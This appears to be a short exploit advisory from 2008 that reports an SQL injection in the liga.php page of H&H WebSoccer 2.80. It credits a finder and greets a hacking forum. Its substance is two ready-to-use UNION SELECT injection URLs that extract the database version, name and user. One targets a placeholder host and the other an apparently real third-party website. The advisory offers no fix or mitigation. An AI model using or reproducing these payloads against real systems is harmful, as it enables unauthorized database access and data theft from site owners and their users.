[~]------------------------------------------------------------------------------------------------------------------
[~] H&H WebSoccer 2.80 (liga.php) SQL injection Vulnerability
[~]
[~] http://www.hh-solutions.de
[~] -------------------------------------------------------------
[~] Bug founded by d3v1l     [avram marius]
[~]
[~] Date: 28.10.2008
[~]
[~]
[~] d3v1l@spoofer.com
[~]
[~] -------------------------------------------------------------
[~] Greetz tO all:-
[~]
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php)
[~]
[~]---------------------------------------------------------------
[~] Ex:-
[~]
[~] http://site.com/liga.php?id=1'UNION SELECT
concat_ws(0x3a,version(),database(),user()),2,3,4,5/*
[~]
[~] http://www.rampageboard.com/Soccer/liga.php?id=1'UNION SELECT
concat_ws(0x3a,version(),database(),user()),2,3,4,5/*
[~]
[~]
[~]---------------------------------------------------------------------------------------------------------------------